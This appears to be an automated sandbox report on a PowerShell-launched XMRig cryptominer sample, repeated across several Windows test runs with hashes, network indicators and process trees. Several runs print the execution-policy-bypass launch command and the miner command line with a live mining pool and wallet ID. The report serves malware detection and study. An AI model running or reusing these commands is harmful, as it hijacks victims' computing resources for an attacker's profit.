Malware Analysis Report

2025-04-19 18:43

Sample ID 240527-ar46zshf21
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags xmrig execution miner
Score 10/10

Analysis Overview

Score 10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:48

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnavl4cd.3bz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:33

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.43:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zisvag1p.5y5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:47

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbbuhwr3.ujq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:56

Platform

win7-20240419-en

Max time kernel

1562s

Max time network

1562s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:02

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a42jyde1.v10.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0vvt4us.tau.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2i5a2uwb.f12.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:51

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4rtrobdh.iit.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:52

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

